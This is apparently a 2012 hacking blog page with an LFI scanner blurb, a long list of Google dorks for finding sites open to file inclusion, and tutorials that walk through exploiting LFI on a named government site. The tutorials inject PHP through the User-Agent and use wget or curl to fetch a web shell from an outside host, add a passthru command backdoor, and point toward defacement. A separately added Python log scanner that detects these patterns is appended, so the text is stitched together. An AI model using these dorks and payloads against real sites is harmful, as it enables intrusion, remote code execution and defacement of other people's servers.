
Thursday, March 22, 2012

PHP : LFI server Scanner by Lagripe-Dz

 LFI ServerScanner

Scans a server's sites trying to find an LFI bug.

The tool works with two markers:

first: [ daemon ], which is in the /etc/passwd file
second: [ failed to open stream ], which appears when there's an error opening the page

This is the result picture:

It's easy to use.

Download Video

Wednesday, March 7, 2012

Google Dorks For RFI & LFI -Sundaravel

    inurl:/modules/My_eGallery/public/displayCategory.php?basepath=

    inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

    inurl:/include/new-visitor.inc.php?lvc_include_dir=

    inurl:/_functions.php?prefix=

    inurl:/cpcommerce/_functions.php?prefix=

    inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=

    inurl:/modules/agendax/addevent.inc.php?agendax_path=

    inurl:/ashnews.php?pathtoashnews=

    inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=

    inurl:/pm/lib.inc.php?pm_path=

    inurl:/b2-tools/gm-2-b2.php?b2inc=

    inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

    inurl:/modules/agendax/addevent.inc.php?agendax_path=

    inurl:/includes/include_once.php?include_file=

    inurl:/e107/e107_handlers/secure_img_render.php?p=

    inurl:/shoutbox/expanded.php?conf=

    inurl:/main.php?x=

    inurl:/myPHPCalendar/admin.php?cal_dir=

    inurl:/index.php/main.php?x=

    inurl:/index.php?include=

    inurl:/index.php?x=

    inurl:/index.php?open=

    inurl:/index.php?visualizar=

    inurl:/template.php?pagina=

    inurl:/index.php?pagina=

    inurl:/index.php?inc=

    inurl:/includes/include_onde.php?include_file=

    inurl:/index.php?page=

    inurl:/index.php?pg=

    inurl:/index.php?show=

    inurl:/index.php?cat=

    inurl:/index.php?file=

    inurl:/db.php?path_local=

    inurl:/index.php?site=

    inurl:/htmltonuke.php?filnavn=

    inurl:/livehelp/inc/pipe.php?HCL_path=

    inurl:/hcl/inc/pipe.php?HCL_path=

    inurl:/inc/pipe.php?HCL_path=

    inurl:/support/faq/inc/pipe.php?HCL_path=

    inurl:/help/faq/inc/pipe.php?HCL_path=

    inurl:/helpcenter/inc/pipe.php?HCL_path=

    inurl:/live-support/inc/pipe.php?HCL_path=

    inurl:/gnu3/index.php?doc=

    inurl:/gnu/index.php?doc=

    inurl:/phpgwapi/setup/tables_update.inc.php?appdir=

    inurl:/forum/install.php?phpbb_root_dir=

    inurl:/includes/calendar.php?phpc_root_path=

    inurl:/includes/setup.php?phpc_root_path=

    inurl:/inc/authform.inc.php?path_pre=

    inurl:/include/authform.inc.php?path_pre=

    inurl:index.php?nic=

    inurl:index.php?sec=

    inurl:index.php?content=

    inurl:index.php?link=

    inurl:index.php?filename=

    inurl:index.php?dir=

    inurl:index.php?document=

    inurl:index.php?view=

    inurl:*.php?sel=

    inurl:*.php?session=&content=

    inurl:*.php?locate=

    inurl:*.php?place=

    inurl:*.php?layout=

    inurl:*.php?go=

    inurl:*.php?catch=

    inurl:*.php?mode=

    inurl:*.php?name=

    inurl:*.php?loc=

    inurl:*.php?f=

    inurl:*.php?inf=

    inurl:*.php?pg=

    inurl:*.php?load=

    inurl:*.php?naam=

    allinurl:/index.php?page= site:*.dk

    allinurl:/index.php?file= site:*.dk



    INURL OR ALLINURL WITH:


    /temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=

    /includes/header.php?systempath=

    /Gallery/displayCategory.php?basepath=

    /index.inc.php?PATH_Includes=

    /ashnews.php?pathtoashnews=

    /ashheadlines.php?pathtoashnews=

    /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

    /demo/includes/init.php?user_inc=

    /jaf/index.php?show=

    /inc/shows.inc.php?cutepath=

    /poll/admin/common.inc.php?base_path=

    /pollvote/pollvote.php?pollname=

    /sources/post.php?fil_config=

    /modules/My_eGallery/public/displayCategory.php?basepath=

    /bb_lib/checkdb.inc.php?libpach=

    /include/livre_include.php?no_connect=lol&chem_absolu=

    /index.php?from_market=Y&pageurl=

    /modules/mod_mainmenu.php?mosConfig_absolute_path=

    /pivot/modules/module_db.php?pivot_path=

    /modules/4nAlbum/public/displayCategory.php?basepath=

    /derniers_commentaires.php?rep=

    /modules/coppermine/themes/default/theme.php?THEME_DIR=

    /modules/coppermine/include/init.inc.php?CPG_M_DIR=

    /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=

    /coppermine/themes/maze/theme.php?THEME_DIR=

    /allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

    /allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=

    /myPHPCalendar/admin.php?cal_dir=

    /agendax/addevent.inc.php?agendax_path=

    /modules/mod_mainmenu.php?mosConfig_absolute_path=

    /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=

    /main.php?page=

    /default.php?page=

    /index.php?action=

    /index1.php?p=

    /index2.php?x=

    /index2.php?content=

    /index.php?conteudo=

    /index.php?cat=

    /include/new-visitor.inc.php?lvc_include_dir=

    /modules/agendax/addevent.inc.php?agendax_path=

    /shoutbox/expanded.php?conf=

    /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

    /pivot/modules/module_db.php?pivot_path=

    /library/editor/editor.php?root=

    /library/lib.php?root=

    /e107/e107_handlers/secure_img_render.php?p=

    /zentrack/index.php?configFile=

    /main.php?x=

    /becommunity/community/index.php?pageurl=

    /GradeMap/index.php?page=

    /index4.php?body=

    /side/index.php?side=

    /main.php?page=

    /es/index.php?action=

    /index.php?sec=

    /index.php?main=

    /index.php?sec=

    /index.php?menu=

    /html/page.php?page=

    /page.php?view=

    /index.php?menu=

    /main.php?view=

    /index.php?page=

    /content.php?page=

    /main.php?page=

    /index.php?x=

    /main_site.php?page=

    /index.php?L2=

    /content.php?page=

    /main.php?page=

    /index.php?x=

    /main_site.php?page=

    /index.php?L2=

    /index.php?show=

    /tutorials/print.php?page=

    /index.php?page=

    /index.php?level=

    /index.php?file=

    /index.php?inter_url=

    /index.php?page=

    /index2.php?menu=

    /index.php?level=

    /index1.php?main=

    /index1.php?nav=

    /index1.php?link=

    /index2.php?page=

    /index.php?myContent=

    /index.php?TWC=

    /index.php?sec=

    /index1.php?main=

    /index2.php?page=

    /index.php?babInstallPath=

    /main.php?body=

    /index.php?z=

    /main.php?view=

    /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

    /index.php?file=

    /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=


    allinurl:my_egallery site:.org
    /modules/My_eGallery/public/displayCategory.php?basepath=

    allinurl:xgallery site:.org
    /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

    allinurl:coppermine site:.org
    /modules/coppermine/themes/default/theme.php?THEME_DIR=

    allinurl:4nAlbum site:.org
    /modules/4nAlbum/public/displayCategory.php?basepath=

    allinurlP:NphpBB2 site:.org
    /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

    allinurl:ihm.php?p=

    Keyword : "powered by AllMyLinks"
    /include/footer.inc.php?_AMLconfig[cfg_serverpath]=

    allinurl:/modules.php?name=allmyguests
    /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

    allinurl:/Popper/index.php?
    /Popper/index.php?childwindow.inc.php?form=

    google = kietu/hit_js.php, allinurl:kietu/hit_js.php
    yahoo = by Kietu? v 3.2
    /kietu/index.php?kietu[url_hit]=

    keyword : "Powered by phpBB 2.0.6"
    /html&highlight=%2527.include($_GET[a]),exit.%2527&a=

    keyword : "powered by CubeCart 3.0.6"
    /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

    keyword : "powered by paBugs 2.0 Beta 3"
    /class.mysql.php?path_to_bt_dir=

    allinurl:"powered by AshNews", allinurl:AshNews or allinurl: /ashnews.php/ashnews.php?pathtoashnews=

    keyword : /phorum/login.php/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=

    allinurl:ihm.php?p=*

    keyword : "powered eyeOs"
    /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cmd=id
    replaced with:
    /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5ba%5d);&a=

    allinurl:.php?bodyfile=

    allinurl:/includes/orderSuccess.inc.php?glob=
    /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

    allinurl:forums.html/modules.php?name=

    allinurl:/default.php?page=home

    allinurl:/folder.php?id=

    allinurl:main.php?pagina=
    /paginedinamiche/main.php?pagina=

    Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( "powered by AllMyGuests")
    /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

    22. allinurl:application.php?base_path=
    /application.php?base_path=

    allinurlp:hplivehelper
    /phplivehelper/initiate.php?abs_path=

    allinurl:phpnuke
    /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

    key word : "powered by Fantastic News v2.1.2"
    /archive.php?CONFIG[script_path]=

    keyword: "powered by smartblog" AND inurl:?page=login
    /index.php?page=

    allinurl:/forum/
    /forum/admin/index.php?inc_conf=

    keyword:"Powered By FusionPHP"
    /templates/headline_temp.php?nst_inc=

    allinurl:shoutbox/expanded.php filetypep:hp
    /shoutbox/expanded.php?conf=

    allinurl: /osticket/
    /osticket/include/main.php?config[search_disp]=true&include_dir=

    keyword : "Powered by iUser"
    /common.php?include_path=

    allinurl: "static.php?load="
    /static.php?load=

    keyworld : /phpcoin/login.php
    /phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=

    keyworld: allinurl:/phpGedview/login.php site:
    /help_text_vars.php?dir&PGV_BASE_DIRECTORY=

    allinurl:/folder.php?id=
    /classes.php?LOCAL_PATH=

    inurl:"/lire.php?rub="

    inurl:"/os/pointer.php?url="

    inurl:"folder.php?id="

    inurl:"show.php?page="

    inurl:"index2.php?DoAction="

    inurl:"index.php?canal="

    inurl:"index.php?screen="

    inurl:"index.php?langc="

    inurl:"index.php?Language="

    inurl:"view.php?page="

    dork: "powered by doodle cart"
    rfi of this dork: enc/content.php?Home_Path=

    dork: "Login to Calendar"
    rfi of this dork: /embed/day.php?path=

    dork: "powered by EQdkp"
    rfi of this dork: /includes/dbal.php?eqdkp_root_path=

    inurl:"template.php?goto="

    inurl:"video.php?content="

    inurl:"pages.php?page="

    inurl:"index1.php?choix="

    inurl:"index1.php?menu="

    inurl:"index2.php?ascii_seite="

    dork: inurl:surveys
    rfi to this dork: /surveys/survey.inc.php?path=

    inurl:"index.php?body="

    dork: allinurl:adobt sitel
    rfi to this dork: /classes/adodbt/sql.php?classes_dir=

    dork: "Powered By ScozNews"
    rfi to this dork: /sources/functions.php?CONFIG[main_path]=
    rfi to this dork: /sources/template.php?CONFIG[main_path]=

    inurl:"kb_constants.php?module_root_path="

    dork: allinurl:"mcf.php"
    rfi to this dork: /mcf.php?content=

    dork: inurl:"main.php?sayfa="
    rfi to this dork: /main.php?sayfa=

    dork: "MobilePublisherPHP"
    rfi to this dork: /header.php?abspath=

    dork: "powered by phpCOIN 1.2.3"
    rfi to rhis dork: /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=

    allinurl:login.php?dir=

    inurl:"index.php?go="

    inurl:"index1.php?="

    inurl:"lib/gore.php?libpath="

    inurl:"index2.php?p="

LFI ( Local File Inclusion ) Website hacking Tutorial -Sundaravel




Let's start.

Few Things You Need to Start 
1) Site vulnerable to LFI ( http://www.bislig.gov.ph )
2) Remote shell ( http://www.yourhosting/urshell.txt
3) User-Agent switcher ( https://addons.mozilla.org/en-US/firefox...-switcher/
4) Mozilla Firefox Browser 



First of all, see if your site is vulnerable to LFI (I'm not going to explain how to find it or exploit it).
Try to open /etc/passwd.
Example: 
http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../etc/passwd

Ok fine... we can open /etc/passwd.
Now type /proc/self/environ.

Example:
http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../proc/self/environ



Now download and install User-Agent switcher.
Go to Tools > Default User-Agent > Edit User Agents
You will get this window.
Now make a new user-agent: go to New > New User-Agent
You will get something like this:


<?php phpinfo();?>
Now leave everything as it is except description and user-agent.
In description enter name of it (Mine is phpinfo)
In User-Agent paste this in there.
Select your User-Agent in Tools > Default User Agent > PHP Info (Or whatever you User Agent is called)

Go to your site and refresh it.
You should get something like this in your site.


Now search for "disable_functions" (Ctrl+F Search function)
Mine is
disable_functions     | no value    | no value
That is good. We can spawn our shell now!
Now go back and edit your User-Agent.
Change "User-Agent" to:
<?exec('wget http://www.sh3ll.org/egy.txt -O shell.php');?>

(What does this function do? It downloads the shell in .txt format and renames it to shell.php.)

Save it and refresh your site.

Go to http://www.LFISITE.com/shell.php (Mine is http://www.bislig.gov.ph/shell.php )

Voila,we have our shell up.
Enjoy.
Demo websites :)

LFI and Shell Upload with Tamper Data

An LFI-vulnerable website URL looks like this:
Code:
www.website.com/index.php?page=/etc/passwd


Here's what the code that makes it vulnerable looks like.


<?php
$file = $_GET['file'];
if (isset($file))
{
    include("pages/$file");
}
else
{
    include("index.php");
}
?>
Few Things You Need for this Method


1. FireFox [download]
2. Tamper Data [download]
3. Vulnerable Sites [Get it here]



or use these dorks for finding vulnerable websites
inurl:index.php?homepage=
inurl:index.php?page=
inurl:index.php?index2=

Now I'm showing how to exploit LFI and upload your shell via /proc/self/environ using Tamper Data.


So after selecting a vulnerable website, check /etc/passwd.
Your page should come up with something that looks like this.



Great!! Now you are sure that the website is vulnerable.
Now check for /proc/self/environ
So change your path to /proc/self/environ


Your page will look  like this if the file exists,
Note - not all websites have it.

I'm interested in HTTP_USER_AGENT. Now I'm going to change our user agent to try and get data from the site by injecting code where our browser's user agent should be.


To do this, I am going to use Tamper Data. Once you have it installed, go to your options, and go to TamperData.



Now you will get a window that looks like this.



your page Must still be /proc/self/environ
Click Start Tamper, and refresh your page.


I'll try some code injection.
After you start tampering, you should see a window that looks like this:





In the User-Agent field, type this 


<?php phpinfo();?>


Now the vulnerable website is downloading;
you will see something like this if you did it correctly.

Now we can execute code, so let's upload your shell.


Open TamperData again, click Start Tamper, and refresh the website. This time, in the User-Agent, enter this:


<?exec('wget http://www.site.com/shell.txt -O shell.php');?>


It will look like this

It downloads the text file and renames it as a PHP file.
You can upload your shell as a text file using free webhosting...
I already shelled a website, so I am going to use that website as file hosting


when you're done with that, you can access your shell directly by going to http://site/shell.php


If you get an error, try using the same method as when you got your
http://www.site.com/index.php?page=/etc/passwd
upload your shell by using the same method.
http://www.site.com/index.php?page=shell.php


If it loads fine the second time, you can upload your deface using the shell... check out the best deface pages here.
When you are done, you have a shell, like this <3

Alternate Method :
Some websites have extra precautions to prevent attacks like these,
so use this alternate method.


Change your user agent to:


<? passthru($_GET['cmd']); ?>


Now load website as
/proc/self/environ?cmd=curl http://www.site.com/shell.txt -o shell.php
Your URL should look like:
http://www.vulnerablesite.com/index.php?page=/proc/self/environ?cmd=curl http://www.yoursite.com/shell.txt -o shell.php


Now hopefully your shell uploaded.


Null Bytes


Adding a , or a nullbyte sometimes filters the site, and you can get around the firewalls.
http://www.site.com/index.php?page=/etc/passwd
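As an added defender-side example (not part of the original tutorial), the check below scans web server access logs for the three request patterns the tutorial relies on: directory traversal to /etc/passwd, a /proc/self/environ read paired with a PHP tag in the User-Agent, and a trailing null byte. The log lines are constructed samples in combined log format and the addresses are documentation IPs; the function and field names are my own.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined format); not taken from any real server.
SAMPLE_LOG = """\
203.0.113.5 - - [22/Mar/2012:10:01:02 +0000] "GET /content1.php?page=5&directLinks=../../../../etc/passwd HTTP/1.1" 200 1834 "-" "Mozilla/5.0"
203.0.113.5 - - [22/Mar/2012:10:01:09 +0000] "GET /index.php?page=/proc/self/environ HTTP/1.1" 200 2210 "-" "<?php phpinfo();?>"
203.0.113.5 - - [22/Mar/2012:10:01:15 +0000] "GET /index.php?page=%2e%2e%2f%2e%2e%2fetc%2fpasswd%00 HTTP/1.1" 200 1834 "-" "Mozilla/5.0"
198.51.100.7 - - [22/Mar/2012:10:02:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def decode(value: str) -> str:
    """Percent-decode twice so double-encoded traversal (%252e%252e) is caught as well."""
    return unquote(unquote(value))

def inspect(path: str, ua: str) -> list[str]:
    """Return the LFI indicators present in one request; an empty list means none seen."""
    p = decode(path)
    hits = []
    if "../" in p or "..\\" in p:
        hits.append("directory traversal")
    if "/etc/passwd" in p:
        hits.append("/etc/passwd read")
    if "/proc/self/environ" in p:
        hits.append("/proc/self/environ read")
    if "\x00" in p:                      # %00 decoded: the null-byte truncation trick
        hits.append("null byte")
    if re.search(r"<\?(php|=)?", decode(ua)):  # PHP open tag smuggled via User-Agent
        hits.append("PHP tag in User-Agent")
    return hits

def scan(log_text: str) -> list[dict]:
    """Parse each log line and report the ones carrying at least one indicator."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        hits = inspect(m["path"], m["ua"])
        if hits:
            findings.append({"ip": m["ip"], "path": m["path"], "indicators": hits})
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ip"], f["path"], "->", ", ".join(f["indicators"]))
```

A hit on /proc/self/environ together with a PHP tag in the User-Agent is the strongest signal, since that pairing is exactly what turns a file read into code execution.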